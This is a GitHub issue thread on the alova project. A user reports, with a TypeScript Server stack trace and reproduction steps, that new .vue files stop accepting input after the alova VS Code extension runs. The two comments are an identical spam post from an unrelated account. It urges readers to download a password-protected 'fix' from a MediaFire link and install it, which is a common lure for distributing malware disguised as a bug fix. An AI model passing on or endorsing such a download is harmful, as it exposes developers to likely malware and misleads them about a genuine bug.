### ISSUE TITLE
[Bug]: 在vscode安装alova后，在项目中新增文件，会抛出异常，导致新增的文件无法输入

### ISSUE THREAD

**Issue by chenxindev** [alovajs/alova#521]
### Is this a Bug?

- [X] I have confirmed that I want to report a Bug

### Has this issue been reported before?

- [X] I have confirmed that this Issue has not been reported before

### Alova Version

3.0.9

### Framework

Vue

### Problem Description

> 环境：vue3 + ts
> vscode：v1.92.2
> alova-vscode插件：v0.0.9
> alova：3.0.9

在vscode安装alova后，在项目中新增文件，会抛出异常，导致新增的文件无法输入
异常如下：
```
<semantic> TypeScript Server Error (5.5.4)
Could not find source file: 'c:/Users/zhunda/Documents/MyProjects/pv-control/src/components/MainView/index.vue'.
Error: Could not find source file: 'c:/Users/zhunda/Documents/MyProjects/pv-control/src/components/MainView/index.vue'.
    at getValidSourceFile (c:\Users\zhunda\AppData\Local\Programs\Microsoft VS Code\resources\app\extensions\node_modules\typescript\lib\typescript.js:148904:22)
    at getEncodedSemanticClassifications3 (c:\Users\zhunda\AppData\Local\Programs\Microsoft VS Code\resources\app\extensions\node_modules\typescript\lib\typescript.js:149442:77)
    at e.getEncodedSemanticClassifications (c:\Users\zhunda\.vscode\extensions\vue.volar-2.0.10\node_modules\typescript-vue-plugin-bundle\index.js:2:22603)
    at e.getEncodedSemanticClassifications (c:\Users\zhunda\.vscode\extensions\vue.volar-2.0.10\node_modules\typescript-vue-plugin-bundle\index.js:450:20897)
    at IpcIOSession.getEncodedSemanticClassifications (c:\Users\zhunda\AppData\Local\Programs\Microsoft VS Code\resources\app\extensions\node_modules\typescript\lib\typescript.js:189824:41)
    at encodedSemanticClassifications-full (c:\Users\zhunda\AppData\Local\Programs\Microsoft VS Code\resources\app\extensions\node_modules\typescript\lib\typescript.js:189121:43)
    at c:\Users\zhunda\AppData\Local\Programs\Microsoft VS Code\resources\app\extensions\node_modules\typescript\lib\typescript.js:191491:69
    at IpcIOSession.executeWithRequestId (c:\Users\zhunda\AppData\Local\Programs\Microsoft VS Code\resources\app\extensions\node_modules\typescript\lib\typescript.js:191483:14)
    at IpcIOSession.executeCommand (c:\Users\zhunda\AppData\Local\Programs\Microsoft VS Code\resources\app\extensions\node_modules\typescript\lib\typescript.js:191491:29)
    at IpcIOSession.onMessage (c:\Users\zhunda\AppData\Local\Programs\Microsoft VS Code\resources\app\extensions\node_modules\typescript\lib\typescript.js:191533:51)
    at process.<anonymous> (c:\Users\zhunda\AppData\Local\Programs\Microsoft VS Code\resources\app\extensions\node_modules\typescript\lib\tsserver.js:523:14)
    at process.emit (node:events:519:28)
    at emit (node:internal/child_process:951:14)
    at process.processTicksAndRejections (node:internal/process/task_queues:83:21)
```
![微信图片_20240827104217](https://github.com/user-attachments/assets/4557f066-ffee-4026-b0c9-1ee54f64c176)

而且要重启vscode才能解决此问题，在开发过程中显得很麻烦，如何解决呢？

### Expected Behavior

新增文件后不再出现这种问题

### Reproduction Steps

1. 安装alova插件；
2. 配置alova.config.ts文件，其中autoUpdate设为false；
3. 运行一次alova，让其生成文件；
4. 在项目中创建“.vue”文件；
5. 此时就会抛出异常；

**Comment by amir1387aht** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by amir1387aht** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."
